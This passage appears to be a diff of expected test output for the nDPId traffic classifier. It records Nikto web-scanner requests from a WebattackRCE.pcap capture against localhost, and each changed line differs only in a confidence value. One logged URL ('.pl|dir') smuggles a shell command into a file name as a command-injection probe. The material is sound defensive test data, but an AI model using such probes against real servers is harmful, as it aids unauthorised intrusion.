Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on 
Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7580000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 